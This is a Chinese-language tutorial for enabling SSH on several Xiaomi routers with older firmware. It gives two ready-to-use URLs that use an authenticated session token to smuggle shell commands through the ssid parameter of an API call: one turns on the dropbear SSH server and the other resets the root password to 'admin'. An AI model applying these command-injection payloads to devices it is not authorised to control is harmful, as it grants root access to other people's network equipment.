小米AX3600/AX1800/AX5/AC2100官方固件开启SSH方法

说明

开启SSH只能采用之前的固件，新版的固件漏洞已经修复了。

文章会提供固件下载

方法

登陆小米路由器管理页面之后可以看到

http://192.168.31.1/cgi-bin/luci/;stok=*****************/web/home#router

将stok后面的参数记录下来

之后在浏览器输入

http://192.168.31.1/cgi-bin/luci/;stok=你登陆后记录的stok/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

返回 {“code”:0} 说明成功了

之后就可以通过root登陆

密码可以通过SN进行计算，不会的话可以通过一下代码直接修改成admin

http://192.168.31.1/cgi-bin/luci/;stok=你登陆后记录的stok
/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

PS

下载的固件为ZIP格式需要解压